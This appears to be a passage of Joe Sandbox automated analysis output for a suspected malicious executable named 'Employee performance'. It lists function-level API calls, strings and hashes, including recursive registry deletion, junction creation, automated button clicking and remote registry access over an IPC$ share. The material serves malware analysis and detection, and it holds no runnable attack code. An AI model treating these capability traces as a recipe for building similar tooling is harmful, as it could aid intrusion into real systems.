Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 9ff8530e02f96e3526fdd5ab9857edc271c0488ab744d4fa11106b4f408b6567
Instruction ID: e9e788c4b57f2451623ec4c52b4be5b508bddce8571431903a5a18f5a4dcbc03
Opcode Fuzzy Hash: 9ff8530e02f96e3526fdd5ab9857edc271c0488ab744d4fa11106b4f408b6567
Instruction Fuzzy Hash: D4818D71508301ABE761CF18CC84AAB7BEDFB88354F04895AFAC597292D775D940CB61

Function 0103DC0E Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0103DC20
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0103DC46
_wcslen.LIBCMT ref: 0103DC50
_wcsstr.LIBVCRUNTIME ref: 0103DCA0
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0103DCBC

Strings

StringFileInfo\, xrefs: 0103DC8F
DefaultLangCodepage, xrefs: 0103DD1F
\VarFileInfo\Translation, xrefs: 0103DCB4
04090000, xrefs: 0103DCF2
%u.%u.%u.%u, xrefs: 0103DD9A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: fd2d69cc2b9b840c00c82f6b43f82064573377a55a7b338d5ce6f755550f230d
Instruction ID: 2d1596356a7f6f45bfd0dfdfb28c46424f9451b0c1b4f8d886feb1f9413d8a64
Opcode Fuzzy Hash: fd2d69cc2b9b840c00c82f6b43f82064573377a55a7b338d5ce6f755550f230d
Instruction Fuzzy Hash: F8414D729402057AEB15B775DC07EBF37ACEF42710F40006EFA80BA153EB799901A7A4

Function 0105CC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0105CC64
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 0105CC8D
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0105CD48

Part of subcall function 0105CC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 0105CCAA
Part of subcall function 0105CC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 0105CCBD
Part of subcall function 0105CC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0105CCCF
Part of subcall function 0105CC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 0105CD05
Part of subcall function 0105CC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 0105CD28

RegDeleteKeyW.ADVAPI32(?,?), ref: 0105CCF3

Strings

advapi32.dll, xrefs: 0105CCB8
RegDeleteKeyExW, xrefs: 0105CCC9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 69cb81728a295e0f50b27ee51d6f368a22280173c442c3e26add7315b30d1251
Instruction ID: f5e96165b0138220b36fd5be6cf96240fc96f36f4a1a2f70d5875dbaea50a758
Opcode Fuzzy Hash: 69cb81728a295e0f50b27ee51d6f368a22280173c442c3e26add7315b30d1251
Instruction Fuzzy Hash: 0B318071901229BBFB719A95DD88EFFBFBCEF06640F0001A5F981E6104D6749A459BB0

Function 01043D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01043D40
_wcslen.LIBCMT ref: 01043D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 01043D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01043DBE
RemoveDirectoryW.KERNEL32(?), ref: 01043DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 01043E55
CloseHandle.KERNEL32(00000000), ref: 01043E60
CloseHandle.KERNEL32(00000000), ref: 01043E6B

Strings

\??\%s, xrefs: 01043D5B
:, xrefs: 01043D82
\, xrefs: 01043D77

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 6be8108e2e1807ccd1d898f9c52942e9bfab2cd62c7548e236327033b083f11b
Instruction ID: b4515ca8d423a0e003af067910e4bb8a3bdef0fc4e2020f934110745a3045348
Opcode Fuzzy Hash: 6be8108e2e1807ccd1d898f9c52942e9bfab2cd62c7548e236327033b083f11b
Instruction Fuzzy Hash: 3031B6B150011AABEB21ABA4DC85FEF37BDFF89700F1040B5F689D6064E77493448B24

Function 0103E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0103E6B4

Part of subcall function 00FEE551: timeGetTime.WINMM(?,?,0103E6D4), ref: 00FEE555

Sleep.KERNEL32(0000000A), ref: 0103E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0103E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0103E727
SetActiveWindow.USER32 ref: 0103E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0103E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0103E773
Sleep.KERNEL32(000000FA), ref: 0103E77E
IsWindow.USER32 ref: 0103E78A
EndDialog.USER32(00000000), ref: 0103E79B

Strings

BUTTON, xrefs: 0103E719

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 159acb4b7854506dc50eb0f415f04db544434a07a6e4dab3a7499d643ed290df
Instruction ID: 73bbbab3a8739232e80f8e073159035e43f0ed4a1ba82a423c30b190694cab99
Opcode Fuzzy Hash: 159acb4b7854506dc50eb0f415f04db544434a07a6e4dab3a7499d643ed290df
Instruction Fuzzy Hash: CE21C670240601AFFB315F24EDD8A293B6DF788348F400635F5D182655DBBBAC109B24

Function 0103E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0103EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0103EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0103EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0103EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0103EAA7

Strings

status PlayMe mode, xrefs: 0103EA58
alias PlayMe, xrefs: 0103EA36
close PlayMe, xrefs: 0103EA6E, 0103EA9B
play PlayMe, xrefs: 0103EAA2
open , xrefs: 0103EA0C
play PlayMe wait, xrefs: 0103EA91

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 4cff909ac196c2cbf192a9652b25c6a7185f2ce3b4745350f81234447c2ddf0f
Instruction ID: 7e8d7395fed4943e46cf1b3aa92c6e7f52fc4df30f901876d61543b22529a505
Opcode Fuzzy Hash: 4cff909ac196c2cbf192a9652b25c6a7185f2ce3b4745350f81234447c2ddf0f
Instruction Fuzzy Hash: D1110630A5026979EB20A3A6DC5AEFF7ABCEFC1F00F04052AB441A60D0EEB11905D5B0

Function 01035CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 01035CE2
GetWindowRect.USER32(00000000,?), ref: 01035CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 01035D59
GetDlgItem.USER32(?,00000002), ref: 01035D69
GetWindowRect.USER32(00000000,?), ref: 01035D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 01035DCF
GetDlgItem.USER32(?,000003E9), ref: 01035DDD
GetWindowRect.USER32(00000000,?), ref: 01035DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 01035E31
GetDlgItem.USER32(?,000003EA), ref: 01035E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 01035E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 01035E67

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 7d1e1dbac669655208b6e01807b80330de2b54028122d9333ed32c726d59d58a
Instruction ID: ab1fdaeb50aac960dffe0fcc62d6c3248a261345997e642c7c37925b21d4314d
Opcode Fuzzy Hash: 7d1e1dbac669655208b6e01807b80330de2b54028122d9333ed32c726d59d58a
Instruction Fuzzy Hash: C3510FB1B00205AFDB18DF68DD89AAE7BF9FB88301F548129F555E7294D774AE00CB60

Function 00FE8BCD Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE8F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FE8BE8,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8FC5

DestroyWindow.USER32(?), ref: 00FE8C81
KillTimer.USER32(00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 00FE8D1B
DestroyAcceleratorTable.USER32(00000000), ref: 01026973
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 010269A1
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000,?), ref: 010269B8
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00FE8BBA,00000000), ref: 010269D4
DeleteObject.GDI32(00000000), ref: 010269E6

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 770f3c135e2d4c3e10bd5506ac6aaa519b7bd814e30be99fa2328159bd5360a4
Instruction ID: 46a70a4684300cc1d7daed2a75ef3594b895eb91c482c81359e4d08613c4299e
Opcode Fuzzy Hash: 770f3c135e2d4c3e10bd5506ac6aaa519b7bd814e30be99fa2328159bd5360a4
Instruction Fuzzy Hash: F2610131502A90DFDB32AF1ACA08B2577F1FB41352F60451DE4C687564CB3BA882EF90

Function 00FE9838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00FE9944: GetWindowLongW.USER32(?,000000EB), ref: 00FE9952

GetSysColor.USER32(0000000F), ref: 00FE9862

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 67442add0da4ff573bc5dfaf1b248eca4855983e9acce0545cb9f1a310be6bf4
Instruction ID: b71d5038156ed4ebeb2425349f0a8477bed2b3f7ea6b168712c6d8d68790a3ba
Opcode Fuzzy Hash: 67442add0da4ff573bc5dfaf1b248eca4855983e9acce0545cb9f1a310be6bf4
Instruction Fuzzy Hash: D7412231504690EFEB305F399884BB93BA5EB06330F544205FAE28B2F5C3B58941EB22

Function 010396E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,0101F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 01039717
LoadStringW.USER32(00000000,?,0101F7F8,00000001), ref: 01039720

Part of subcall function 00FD9CB3: _wcslen.LIBCMT ref: 00FD9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,0101F7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 01039742
LoadStringW.USER32(00000000,?,0101F7F8,00000001), ref: 01039745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 01039866

Strings

^ ERROR, xrefs: 010397FB
Line %d (File "%s"):, xrefs: 0103978F
Error: , xrefs: 0103981D
Line %d:, xrefs: 010397A0
%s (%d) : ==> %s: %s %s, xrefs: 0103984A

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: 28e1f637e6b07b02fe31f63d826a20bbabec22bcd3b30c8c7a8ac43a4835182a
Instruction ID: 3e492ba19b259f37995f14b3e69e0e58ef3a98f69a4a43a14ed997b2b4e59dd6
Opcode Fuzzy Hash: 28e1f637e6b07b02fe31f63d826a20bbabec22bcd3b30c8c7a8ac43a4835182a
Instruction Fuzzy Hash: 42418E7290420AAADF04FBE0DE92DEE777EAF54344F540026F24172191EB796F48EB61

Function 010306DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00FD6B57: _wcslen.LIBCMT ref: 00FD6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 010307A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 010307BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 010307DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 01030804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0103082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 01030837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0103083C

Strings

SOFTWARE\Classes\, xrefs: 0103070E
\CLSID, xrefs: 01030724
\IPC$, xrefs: 01030784

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 9fd11368a3debfca0f990a768ae6be19b9497bfdfe535b380c51213caa5ed1ad
Instruction ID: 4e74a3b76e9702790861cccf68629b6cac8d1c814e8848dbc908c02c701a256a
Opcode Fuzzy Hash: 9fd11368a3debfca0f990a768ae6be19b9497bfdfe535b380c51213caa5ed1ad
Instruction Fuzzy Hash: D7413C75C10229ABDF21EB94DC95CEDB7B9FF44750F08416AF981A3261EB349E04DB90

Function 01053C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01053C5C
CoInitialize.OLE32(00000000), ref: 01053C8A
CoUninitialize.OLE32 ref: 01053C94
_wcslen.LIBCMT ref: 01053D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 01053DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 01053ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 01053F0E
CoGetObject.OLE32(?,00000000,0106FB98,?), ref: 01053F2D
SetErrorMode.KERNEL32(00000000), ref: 01053F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01053FC4
VariantClear.OLEAUT32(?), ref: 01053FD8

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 4573aed08976f2051c3ab09bf84247ae44d647abccb7fcf68f8e6ada5dd9daa7
Instruction ID: 38d8868d918ad06d7424d2265e4dd713579cf7a68c5c88ceb22459602b3508db
Opcode Fuzzy Hash: 4573aed08976f2051c3ab09bf84247ae44d647abccb7fcf68f8e6ada5dd9daa7
Instruction Fuzzy Hash: 2FC133716083059FD790DF68C88492BBBE9FF89788F04495DF98A9B250DB31ED05CB62

Function 01047A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 01047AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 01047B8F
SHGetDesktopFolder.SHELL32(?), ref: 01047BA3
CoCreateInstance.OLE32(0106FD08,00000000,00000001,01096E6C,?), ref: 01047BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 01047C74
CoTaskMemFree.OLE32(?,?), ref: 01047CCC
SHBrowseForFolderW.SHELL32(?), ref: 01047D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 01047D7A
CoTaskMemFree.OLE32(00000000), ref: 01047D81
CoTaskMemFree.OLE32(00000000), ref: 01047DD6
CoUninitialize.OLE32 ref: 01047DDC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 9cca19cf75c96f65aa3313340d3bd29ec43c24c84fc89373bf4536cbfcd94f8f
Instruction ID: b02c312fb952edcc46bb8a4467b5a8d98ecebf644c30d9c1ad74f83ec67a0673
Opcode Fuzzy Hash: 9cca19cf75c96f65aa3313340d3bd29ec43c24c84fc89373bf4536cbfcd94f8f
Instruction Fuzzy Hash: 84C15A75A00209AFDB14DFA4C8C4DAEBBF9FF48304B1484A9E9599B361DB35ED41CB90

Function 0106541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 01065504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 01065515
CharNextW.USER32(00000158), ref: 01065544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 01065585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0106559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 010655AC

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: bdab0f53e297447e517ae88e007bf26ae61de5e2cb9bd9d856adf9c4f8ea8e25
Instruction ID: 0879dc71b458274840148f66b6edbc495daf107eadc9db55c7eee95fa1ca746c
Opcode Fuzzy Hash: bdab0f53e297447e517ae88e007bf26ae61de5e2cb9bd9d856adf9c4f8ea8e25
Instruction Fuzzy Hash: 54617434900209AFEF209F54CC849FE7BBDEF0A7A4F004185F6E5A7290D7759A41CB61

Function 0102FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0102FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0102FB08
VariantInit.OLEAUT32(?), ref: 0102FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0102FB3A
VariantCopy.OLEAUT32(?,?), ref: 0102FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0102FBA1
VariantClear.OLEAUT32(?), ref: 0102FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0102FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0102FBCC
VariantClear.OLEAUT32(?), ref: 0102FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0102FBE9

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
